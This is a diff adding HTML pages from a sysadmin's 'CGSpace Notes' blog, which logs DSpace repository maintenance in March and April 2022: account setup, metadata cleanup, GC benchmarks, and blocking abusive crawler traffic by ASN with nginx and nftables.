+<li>Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p <span style="color:#e6db74">&#39;fuuuuuuuu&#39;</span>
+</span></span></code></pre></div><ul>
+<li>I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
+<ul>
+<li>According to my notes from <a href="/cgspace-notes/2020-10/">2020-10</a> the account must be in the admin group in order to submit via the REST API</li>
+</ul>
+</li>
+<li>Abenet and I noticed 1,735 items in CTA&rsquo;s community that have the title &ldquo;delete&rdquo;
+<ul>
+<li>We asked Peter and he said we should delete them</li>
+<li>I exported the CTA community metadata and used OpenRefine to filter all items with the &ldquo;delete&rdquo; title, then used the &ldquo;expunge&rdquo; bulkedit action to remove them</li>
+</ul>
+</li>
+<li>I realized I forgot to clean up the old Let&rsquo;s Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago
+<ul>
+<li>I also removed the pre-Ubuntu 20.04 Let&rsquo;s Encrypt stuff from the Ansble infrastructure playbooks</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-03-29">2022-03-29</h2>
+<ul>
+<li>Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents
+<ul>
+<li>I created a filter in LibreOffice and selected the IDs for items with the action &ldquo;delete&rdquo;, then I created a custom text facet in OpenRefine with this GREL:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>or(
+isNotNull(value.match(&#39;33&#39;)),
+isNotNull(value.match(&#39;179&#39;)),
+isNotNull(value.match(&#39;452&#39;)),
+isNotNull(value.match(&#39;489&#39;)),
+isNotNull(value.match(&#39;541&#39;)),
+isNotNull(value.match(&#39;568&#39;)),
+isNotNull(value.match(&#39;646&#39;)),
+isNotNull(value.match(&#39;889&#39;))
+)
+</code></pre><ul>
+<li>Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported the 692 items on CGSpace, and generated the thumbnails:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;</span>
+</span></span><span style="display:flex;"><span>$ dspace import --add --eperson<span style="color:#f92672">=</span>umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-03-29-cgiar-tac.map
+</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace filter-media -p <span style="color:#e6db74">&#34;ImageMagick PDF Thumbnail&#34;</span> -i 10947/50
+</span></span></code></pre></div><ul>
+<li>After that I did some normalization on the <code>cg.subject.system</code> metadata and extracted a few dozen countries to the country field</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-03-30">2022-03-30</h2>
+<ul>
+<li>Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p <span style="color:#e6db74">&#39;fuuuu&#39;</span>
+</span></span></code></pre></div><ul>
+<li>I started looking into the request regarding the CIAT Library PDFs
+<ul>
+<li>There are over 4,000 links to PDFs hosted on that server in CGSpace metadata</li>
+<li>The links seem to be down though! I emailed Paola to ask</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-03-31">2022-03-31</h2>
+<ul>
+<li>Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC</li>
+<li>I will do the following for CMS and G1GC on DSpace Test:
+<ul>
+<li>Wait for startup</li>
+<li>Reload home page</li>
+<li>Log in</li>
+<li>Do a search for &ldquo;livestock&rdquo;</li>
+<li>Click AGROVOC facet for livestock</li>
+<li>dspace index-discovery -b</li>
+<li>dspace-statistics-api index</li>
+</ul>
+</li>
+<li>With CMS the Discovery Index took:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>real    379m19.245s
+</span></span><span style="display:flex;"><span>user    267m17.704s
+</span></span><span style="display:flex;"><span>sys     4m2.937s
+</span></span></code></pre></div><ul>
+<li>Leroy from CIAT said that the CIAT Library server has security issues so was limited to internal traffic
+<ul>
+<li>I extracted a list of URLs from CGSpace to send him:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ &#39;https?://ciat-library&#39;) to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 4552
+</span></span></code></pre></div><ul>
+<li>I did some checks and cleanups in OpenRefine because there are some values with &ldquo;#page&rdquo; etc
+<ul>
+<li>Once I sorted them there were only ~2,700, which means there are going to be almost two thousand items with duplicate PDFs</li>
+<li>I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2022-04/index.html b/docs/2022-04/index.html
new file mode 100644
index 000000000..f61540195
--- /dev/null
+++ b/docs/2022-04/index.html
@@ -0,0 +1,563 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="April, 2022" />
+<meta property="og:description" content="2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54." />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-04/" />
+<meta property="article:published_time" content="2022-04-01T10:53:39+03:00" />
+<meta property="article:modified_time" content="2022-05-04T11:09:45+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="April, 2022"/>
+<meta name="twitter:description" content="2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "April, 2022",
+  "url": "https://alanorth.github.io/cgspace-notes/2022-04/",
+  "wordCount": "2015",
+  "datePublished": "2022-04-01T10:53:39+03:00",
+  "dateModified": "2022-05-04T11:09:45+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-04/">
+
+    <title>April, 2022 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-04/">April, 2022</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2022-04-01T10:53:39+03:00">Fri Apr 01, 2022</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-04-01">2022-04-01</h2>
+<ul>
+<li>I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday
+<ul>
+<li>The Discovery indexing took this long:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>real    334m33.625s
+</span></span><span style="display:flex;"><span>user    227m51.331s
+</span></span><span style="display:flex;"><span>sys     3m43.037s
+</span></span></code></pre></div><h2 id="2022-04-04">2022-04-04</h2>
+<ul>
+<li>Start a full harvest on AReS</li>
+<li>Help Marianne with submit/approve access on a new collection on CGSpace</li>
+<li>Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc)</li>
+<li>Looking at the Solr statistics for 2022-03 on CGSpace
+<ul>
+<li>I see 54.229.218.204 on Amazon AWS made 49,000 requests, some of which with this user agent: <code>Apache-HttpClient/4.5.9 (Java/1.8.0_322)</code>, and many others with a normal browser agent, so that&rsquo;s fishy!</li>
+<li>The DSpace agent pattern <code>http.?agent</code> seems to have caught the first ones, but I&rsquo;ll purge the IP ones</li>
+<li>I see 40.77.167.80 is Bing or MSN Bot, but using a normal browser user agent, and if I search Solr for <code>dns:*msnbot* AND dns:*.msn.com.</code> I see over 100,000, which is a problem I noticed a few months ago too&hellip;</li>
+<li>I extracted the MSN Bot IPs from Solr using an IP facet, then used the <code>check-spider-ip-hits.sh</code> script to purge them</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-04-10">2022-04-10</h2>
+<ul>
+<li>Start a full harvest on AReS</li>
+</ul>
+<h2 id="2022-04-13">2022-04-13</h2>
+<ul>
+<li>UptimeRobot mailed to say that CGSpace was down
+<ul>
+<li>I looked and found the load at 44&hellip;</li>
+</ul>
+</li>
+<li>There seem to be a lot of locks from the XMLUI:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi)&#39;</span> | sort | uniq -c | sort -n
+</span></span><span style="display:flex;"><span>   3173 dspaceWeb
+</span></span></code></pre></div><ul>
+<li>Looking at the top IPs in nginx&rsquo;s access log one IP in particular stands out:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>    941 66.249.66.222
+</span></span><span style="display:flex;"><span>   1224 95.108.213.28
+</span></span><span style="display:flex;"><span>   2074 157.90.209.76
+</span></span><span style="display:flex;"><span>   3064 66.249.66.221
+</span></span><span style="display:flex;"><span>  95743 185.192.69.15
+</span></span></code></pre></div><ul>
+<li>185.192.69.15 is in the UK</li>
+<li>I added a block for that IP in nginx and the load went down&hellip;</li>
+</ul>
+<h2 id="2022-04-16">2022-04-16</h2>
+<ul>
+<li>Start harvest on AReS</li>
+</ul>
+<h2 id="2022-04-18">2022-04-18</h2>
+<ul>
+<li>I woke up to several notices from UptimeRobot that CGSpace had gone down and up in the night (of course I&rsquo;m on holiday out of the country for Easter)
+<ul>
+<li>I see there are many locks in use from the XMLUI:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi)&#39;</span> | sort | uniq -c
+</span></span><span style="display:flex;"><span>   8932 dspaceWeb
+</span></span></code></pre></div><ul>
+<li>Looking at the top IPs making requests it seems they are Yandex, bingbot, and Googlebot:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -h
+</span></span><span style="display:flex;"><span>    752 69.162.124.231
+</span></span><span style="display:flex;"><span>    759 66.249.64.213
+</span></span><span style="display:flex;"><span>    864 66.249.66.222
+</span></span><span style="display:flex;"><span>    905 2a01:4f8:221:f::2
+</span></span><span style="display:flex;"><span>   1013 84.33.2.97
+</span></span><span style="display:flex;"><span>   1201 157.55.39.159
+</span></span><span style="display:flex;"><span>   1204 157.55.39.144
+</span></span><span style="display:flex;"><span>   1209 157.55.39.102
+</span></span><span style="display:flex;"><span>   1217 157.55.39.161
+</span></span><span style="display:flex;"><span>   1252 207.46.13.177
+</span></span><span style="display:flex;"><span>   1274 157.55.39.162
+</span></span><span style="display:flex;"><span>   2553 66.249.66.221
+</span></span><span style="display:flex;"><span>   2941 95.108.213.28
+</span></span></code></pre></div><ul>
+<li>One IP is using a stange user agent though:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>84.33.2.97 - - [18/Apr/2022:00:20:38 +0200] &#34;GET /bitstream/handle/10568/109581/Banana_Blomme%20_2020.pdf.jpg HTTP/1.1&#34; 404 10890 &#34;-&#34; &#34;SomeRandomText&#34;
+</span></span></code></pre></div><ul>
+<li>Overall, it seems we had 17,000 unique IPs connecting in the last nine hours (currently 9:14AM and log file rolled over at 00:00):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>17314
+</span></span></code></pre></div><ul>
+<li>That&rsquo;s a lot of unique IPs, and I see some patterns of IPs in China making ten to twenty requests each
+<ul>
+<li>The ISPs I&rsquo;ve seen so far are ChinaNet and China Unicom</li>
+</ul>
+</li>
+<li>I extracted all the IPs from today and resolved them:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/2022-04-18-ips.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2022-04-18-ips.txt -o /tmp/2022-04-18-ips.csv
+</span></span></code></pre></div><ul>
+<li>The top ASNs by IP are:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">2</span> /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span> 
+</span></span><span style="display:flex;"><span>    102 GOOGLE
+</span></span><span style="display:flex;"><span>    139 Maxihost LTDA
+</span></span><span style="display:flex;"><span>    165 AMAZON-02
+</span></span><span style="display:flex;"><span>    393 &#34;China Mobile Communications Group Co., Ltd.&#34;
+</span></span><span style="display:flex;"><span>    473 AMAZON-AES
+</span></span><span style="display:flex;"><span>    616 China Mobile communications corporation
+</span></span><span style="display:flex;"><span>    642 M247 Ltd
+</span></span><span style="display:flex;"><span>   2336 HostRoyale Technologies Pvt Ltd
+</span></span><span style="display:flex;"><span>   4556 Chinanet
+</span></span><span style="display:flex;"><span>   5527 CHINA UNICOM China169 Backbone
+</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">4</span> /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
+</span></span><span style="display:flex;"><span>    139 262287
+</span></span><span style="display:flex;"><span>    165 16509
+</span></span><span style="display:flex;"><span>    180 204287
+</span></span><span style="display:flex;"><span>    393 9808
+</span></span><span style="display:flex;"><span>    473 14618
+</span></span><span style="display:flex;"><span>    615 56041
+</span></span><span style="display:flex;"><span>    642 9009
+</span></span><span style="display:flex;"><span>   2156 203020
+</span></span><span style="display:flex;"><span>   4556 4134
+</span></span><span style="display:flex;"><span>   5527 4837
+</span></span></code></pre></div><ul>
+<li>I spot checked a few IPs from each of these and they are definitely just making bullshit requests to Discovery and HTML sitemap etc</li>
+<li>I will download the IP blocks for each ASN except Google and Amazon and ban them</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS4837 https://asn.ipinfo.app/api/text/nginx/AS4134 https://asn.ipinfo.app/api/text/nginx/AS203020 https://asn.ipinfo.app/api/text/nginx/AS9009 https://asn.ipinfo.app/api/text/nginx/AS56041 https://asn.ipinfo.app/api/text/nginx/AS9808
+</span></span><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>20296
+</span></span></code></pre></div><ul>
+<li>I extracted the IPv4 and IPv6 networks:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | grep <span style="color:#e6db74">&#34;:&#34;</span> | sort &gt; /tmp/ipv6-networks.txt
+</span></span><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | grep -v <span style="color:#e6db74">&#34;:&#34;</span> | sort &gt; /tmp/ipv4-networks.txt
+</span></span></code></pre></div><ul>
+<li>I suspect we need to aggregate these networks since they are so many and nftables doesn&rsquo;t like it when they overlap:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wc -l /tmp/ipv4-networks.txt
+</span></span><span style="display:flex;"><span>15464 /tmp/ipv4-networks.txt
+</span></span><span style="display:flex;"><span>$ aggregate6 /tmp/ipv4-networks.txt | wc -l
+</span></span><span style="display:flex;"><span>2781
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/ipv6-networks.txt             
+</span></span><span style="display:flex;"><span>4833 /tmp/ipv6-networks.txt
+</span></span><span style="display:flex;"><span>$ aggregate6 /tmp/ipv6-networks.txt | wc -l
+</span></span><span style="display:flex;"><span>338
+</span></span></code></pre></div><ul>
+<li>I deployed these lists on CGSpace, ran all updates, and rebooted the server
+<ul>
+<li>This list is SURELY too broad because we will block legitimate users in China&hellip; but right now how can I discern?</li>
+<li>Also, I need to purge the hits from these 14,000 IPs in Solr when I get time</li>
+</ul>
+</li>
+<li>Looking back at the Munin graphs a few hours later I see this was indeed some kind of spike that was out of the ordinary:</li>
+</ul>
+<p><img src="/cgspace-notes/2022/04/postgres_connections_ALL-day.png" alt="PostgreSQL connections day">
+<img src="/cgspace-notes/2022/04/jmx_dspace_sessions-day.png" alt="DSpace sessions day"></p>
+<ul>
+<li>I used <code>grepcidr</code> with the aggregated network lists to extract IPs matching those networks from the nginx logs for the past day:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort -u &gt; /tmp/ips.log
+</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">while</span> read -r network; <span style="color:#66d9ef">do</span> grepcidr $network /tmp/ips.log &gt;&gt; /tmp/ipv4-ips.txt; <span style="color:#66d9ef">done</span> &lt; /tmp/ipv4-networks-aggregated.txt
+</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">while</span> read -r network; <span style="color:#66d9ef">do</span> grepcidr $network /tmp/ips.log &gt;&gt; /tmp/ipv6-ips.txt; <span style="color:#66d9ef">done</span> &lt; /tmp/ipv6-networks-aggregated.txt
+</span></span><span style="display:flex;"><span># wc -l /tmp/ipv4-ips.txt  
+</span></span><span style="display:flex;"><span>15313 /tmp/ipv4-ips.txt
+</span></span><span style="display:flex;"><span># wc -l /tmp/ipv6-ips.txt 
+</span></span><span style="display:flex;"><span>19 /tmp/ipv6-ips.txt
+</span></span></code></pre></div><ul>
+<li>Then I purged them from Solr using the <code>check-spider-ip-hits.sh</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ipv4-ips.txt -p
+</span></span></code></pre></div><h2 id="2022-04-23">2022-04-23</h2>
+<ul>
+<li>A handful of spider user agents that I identified were merged into COUNTER-Robots so I updated the ILRI override in our DSpace and regenerated the <code>example</code> file that contains most patterns
+<ul>
+<li>I updated CGSpace, then ran all system updates and rebooted the host</li>
+<li>I also ran <code>dspace cleanup -v</code> to prune the database</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-04-24">2022-04-24</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-04-25">2022-04-25</h2>
+<ul>
+<li>Looking at the countries on AReS I decided to collect a list to remind Jacquie at WorldFish again about how many incorrect ones they have
+<ul>
+<li>There are about sixty incorrect ones, some of which I can correct via the value mappings on AReS, but most I can&rsquo;t</li>
+<li>I set up value mappings for seventeen countries, then sent another sixty or so to Jacquie and Salem to hopefully delete</li>
+</ul>
+</li>
+<li>I notice we have over 1,000 items with region <code>Africa South of Sahara</code>
+<ul>
+<li>I am surprised to see these because we did a mass migration to <code>Sub-Saharan Africa</code> in 2020-10 when we aligned to UN M.49</li>
+<li>Oh! It seems I used a capital O in <code>Of</code>!</li>
+<li>This is curious, I see we missed <code>East Asia</code> and <code>Northern America</code>, because those are still in our list, but UN M.49 uses <code>Eastern Asia</code> and <code>Northern America</code>&hellip; I will have to raise that with Peter and Abenet later</li>
+<li>For now I will just re-run my fixes:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/regions.csv
+</span></span><span style="display:flex;"><span>cg.coverage.region,correct
+</span></span><span style="display:flex;"><span>East Africa,Eastern Africa
+</span></span><span style="display:flex;"><span>West Africa,Western Africa
+</span></span><span style="display:flex;"><span>Southeast Asia,South-eastern Asia
+</span></span><span style="display:flex;"><span>South Asia,Southern Asia
+</span></span><span style="display:flex;"><span>Africa South of Sahara,Sub-Saharan Africa
+</span></span><span style="display:flex;"><span>North Africa,Northern Africa
+</span></span><span style="display:flex;"><span>West Asia,Western Asia
+</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/regions.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.coverage.region -m <span style="color:#ae81ff">227</span> -t correct
+</span></span></code></pre></div><ul>
+<li>Then I started a new harvest on AReS</li>
+</ul>
+<h2 id="2022-04-27">2022-04-27</h2>
+<ul>
+<li>I woke up to many up down notices for CGSpace from UptimeRobot
+<ul>
+<li>The server has load 111.0&hellip; sigh.</li>
+</ul>
+</li>
+<li>According to Grafana it seems to have started at 4:00 AM</li>
+</ul>
+<p><img src="/cgspace-notes/2022/04/cgspace-load.png" alt="Grafana load"></p>
+<ul>
+<li>There are a metric fuck ton of database locks from the XMLUI:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi)&#39;</span> | sort | uniq -c
+</span></span><span style="display:flex;"><span>    128 dspaceApi
+</span></span><span style="display:flex;"><span>  16890 dspaceWeb
+</span></span></code></pre></div><ul>
+<li>As for the server logs, I don&rsquo;t see many IPs connecting today:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>2924
+</span></span></code></pre></div><ul>
